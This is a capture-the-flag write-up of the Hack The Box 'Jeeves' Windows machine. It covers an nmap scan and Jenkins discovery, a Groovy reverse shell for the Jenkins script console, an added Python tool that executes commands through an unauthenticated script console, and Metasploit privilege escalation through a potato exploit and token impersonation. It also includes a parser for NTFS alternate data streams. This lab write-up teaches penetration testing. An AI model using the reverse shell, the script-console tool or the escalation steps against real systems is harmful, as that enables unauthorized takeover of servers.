Hackthebox - Jeeves
Windows

Nmap
┌──(root💀kali)-[~]
└─# nmap -T4 -A -p- 10.10.10.63                                                                                     
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 13:34 EDT
Nmap scan report for 10.10.10.63
Host is up (0.025s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|10|7|Vista (88%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (88%), Microsoft Windows 10 1607 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (85%), Microsoft Windows 7 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%), Microsoft Windows 10 1511 - 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time: 
|   date: 2022-04-08T22:44:11
|_  start_date: 2022-04-08T22:41:38
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 5h07m23s, deviation: 0s, median: 5h07m23s
TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   24.57 ms 10.10.14.1
2   24.81 ms 10.10.10.63
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.40 seconds
Port 80
We have this page

It seems to give a stack trace when we try to search for something

But it is just an image; the form's action simply sends us to error.html

Gobuster does not give much
Port 50000
Here is what we see on the browser for this port:

Gobuster does not always find things on the first run, so we need to try different wordlists; I tried a few before getting the askjeeves result. The one that found it is
directory-list-2.3-big.txt
If we navigate to /askjeeves we find a Jenkins server

If we go to the Jenkins CLI page we can download a jar and execute commands through it

If we look at the system info we get a user name:
kohsuke
The script console also seems interesting, so let's try to get a reverse shell this way
We can find one online here:
// Groovy reverse shell for the Jenkins script console.
// host must be the attacker's address (our tun0 IP), not localhost.
String host="localhost";
int port=8044;
String cmd="cmd.exe";
// spawn cmd.exe and open a TCP connection back to the listener
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
// pump process output to the socket and socket input to the process
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();
  Thread.sleep(50);
  try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();
s.close();
Let's set a listener
rlwrap nc -lvp 8044
It works, we are
jeeves\kohsuke
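The same foothold can be driven without a reverse shell, by posting Groovy to the script console and reading the result back. The following is an added example written for this page, not code from the original write-up or from Jenkins; it assumes the classic Jenkins UI (POST <base>/script with a `script` form field, a CSRF crumb from <base>/crumbIssuer/api/json when protection is on, and the result rendered as `<h2>Result</h2><pre>...</pre>`). The base URL and command on the usage line are placeholders.

```python
"""Run a command through an unauthenticated Jenkins script console.

Added example, not from the original write-up. Assumptions: classic Jenkins UI
(POST <base>/script, form field "script"), optional CSRF crumb from
<base>/crumbIssuer/api/json, result rendered as <h2>Result</h2><pre>...</pre>.
"""
import html
import http.cookiejar
import json
import re
import sys
import urllib.error
import urllib.parse
import urllib.request
from typing import Optional

RESULT_RE = re.compile(r"<h2>Result</h2>\s*<pre>(.*?)</pre>", re.S)


def build_groovy(command: str) -> str:
    """Groovy that runs `command` via cmd.exe and prints stdout + stderr.
    Backslashes, quotes and '$' are escaped so the command survives being
    embedded in a Groovy double-quoted (interpolating) string."""
    escaped = (command.replace("\\", "\\\\")
                      .replace('"', '\\"')
                      .replace("$", "\\$"))
    lines = [
        f'def p = ["cmd.exe", "/c", "{escaped}"].execute()',
        "def out = new StringBuffer(); def err = new StringBuffer()",
        "p.consumeProcessOutput(out, err); p.waitFor()",
        "println(out.toString() + err.toString())",
    ]
    return "\n".join(lines)


def parse_result(page: str) -> Optional[str]:
    """Extract the <pre> block that follows the Result heading, or None
    when the page carried no script output."""
    m = RESULT_RE.search(page)
    return html.unescape(m.group(1)).strip() if m else None


class ScriptConsole:
    def __init__(self, base_url: str):
        self.base = base_url.rstrip("/")
        # cookie jar: newer Jenkins releases tie the crumb to the session cookie
        self.opener = urllib.request.build_opener(
            urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar()))

    def crumb_headers(self) -> dict:
        """CSRF crumb header; empty when the crumb issuer is absent (404)."""
        try:
            with self.opener.open(self.base + "/crumbIssuer/api/json", timeout=10) as r:
                data = json.load(r)
            return {data["crumbRequestField"]: data["crumb"]}
        except urllib.error.HTTPError as e:
            if e.code == 404:
                return {}
            raise

    def run(self, command: str) -> Optional[str]:
        """Submit the Groovy wrapper for `command` and return its output."""
        body = urllib.parse.urlencode({"script": build_groovy(command)}).encode()
        req = urllib.request.Request(self.base + "/script", data=body,
                                     headers=self.crumb_headers())
        with self.opener.open(req, timeout=30) as r:
            return parse_result(r.read().decode("utf-8", errors="replace"))


if __name__ == "__main__":
    # usage: python jenkins_script.py http://10.10.10.63:50000/askjeeves "whoami /priv"
    if len(sys.argv) < 2:
        sys.exit("usage: jenkins_script.py <jenkins base url> [command]")
    base, cmd = sys.argv[1], " ".join(sys.argv[2:]) or "whoami"
    print(ScriptConsole(base).run(cmd))
```

The Groovy wrapper runs the command through cmd.exe and prints both output streams, so errors such as "Access is denied" come back in the same `<pre>` block instead of being lost; the crumb fetch is what keeps this working on instances where CSRF protection is enabled but the console itself is still reachable anonymously.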

We can grab our user flag
type C:\Users\kohsuke\Desktop\user.txt
Here are our privileges

We have SeImpersonatePrivilege enabled. We can use Windows Exploit Suggester with the output of systeminfo
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
python windows-exploit-suggester.py --update
(to get the latest db file)
python windows-exploit-suggester.py --database 2022-04-08-mssb.xls -i ../sysinfo.txt
We have a lot of options including potatoes
Privesc with rotten potato
Launch msfconsole
use exploit/multi/script/web_delivery
show targets
set target 2
(target 2 is PSH, the PowerShell delivery)
set payload windows/meterpreter/reverse_tcp
set lhost tun0
set SRVHOST tun0
run
Now we just need to execute this in our target

And we get a meterpreter session

Let's interact with it
sessions -i 1
To get the built-in potato options, let's use the Metasploit local exploit suggester
run post/multi/recon/local_exploit_suggester
Using ctrl+z, let's now background the session
use exploit/windows/local/ms16_075_reflection_juicy
show options
set session 1
set LHOST tun0
run
And it worked

load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
Even though we got NT AUTHORITY\SYSTEM, the root flag is not here; instead we have this

If we run
dir /R
we can see our flag, hidden in an alternate data stream of hm.txt. We can print it with
more < hm.txt:root.txt:$DATA
Here are a few methods on how to print alternate data streams
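To find such hidden streams without eyeballing the listing, here is an added example (written for this page, not taken from the original write-up): a Python parser for `dir /R` (or `dir /R /S`) output that reports every file carrying a named `$DATA` stream, plus a reader that opens `file:stream` directly when run on the Windows host itself. The sample listing embedded in it is constructed; the directory and sizes in it are not taken from the box.

```python
"""Find NTFS alternate data streams (ADS) in `dir /R` output.

Added example, not part of the original write-up. `dir /R` prints each extra
stream on its own indented line, as "<size> <file>:<stream>:$DATA", right
after the line of the file that owns it. The SAMPLE listing is constructed.
"""
import ntpath
import os
import re
from typing import Dict, List, Tuple

DIR_RE = re.compile(r"^\s*Directory of (.+?)\s*$")
# indented size, then file:stream:$DATA (stream names cannot contain ':' or '\')
STREAM_RE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:\\]+):\$DATA\s*$")


def parse_dir_r(listing: str) -> Dict[str, List[Tuple[str, int]]]:
    """Map each file that carries a named stream to its [(stream, size)] list.
    Keys are full paths when a 'Directory of' header precedes the entry,
    as in real `dir /R` and `dir /R /S` output."""
    found: Dict[str, List[Tuple[str, int]]] = {}
    cwd = ""
    for line in listing.splitlines():
        m = DIR_RE.match(line)
        if m:
            cwd = m.group(1)
            continue
        m = STREAM_RE.match(line)
        if m:
            size, fname, sname = m.groups()
            path = ntpath.join(cwd, fname) if cwd else fname
            found.setdefault(path, []).append((sname, int(size.replace(",", ""))))
    return found


def read_stream(path: str, stream: str) -> bytes:
    """Read a named stream directly; NTFS/Windows only. Same data as
    `more < path:stream:$DATA` in cmd."""
    with open(f"{path}:{stream}", "rb") as f:
        return f.read()


# constructed sample of `dir /R` output, not captured from the box
SAMPLE = r"""
 Volume in drive C has no label.
 Volume Serial Number is 0000-0000

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
11/03/2017  11:27 PM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM             1,024 notes.txt
               2 File(s)          1,060 bytes
               2 Dir(s)  11,139,981,312 bytes free
"""

if __name__ == "__main__":
    for path, entries in parse_dir_r(SAMPLE).items():
        for name, size in entries:
            print(f"{path} -> hidden stream '{name}' ({size} bytes)")
            # reading the stream only works on the Windows host that has the file
            if os.name == "nt" and os.path.exists(path):
                print(read_stream(path, name).decode(errors="replace"))
```

Run against the saved output of `dir /R /S C:\Users` this turns a long listing into a short list of files worth a second look; a normal file only has the unnamed `::$DATA` stream, so any named stream is by definition something someone put there on purpose.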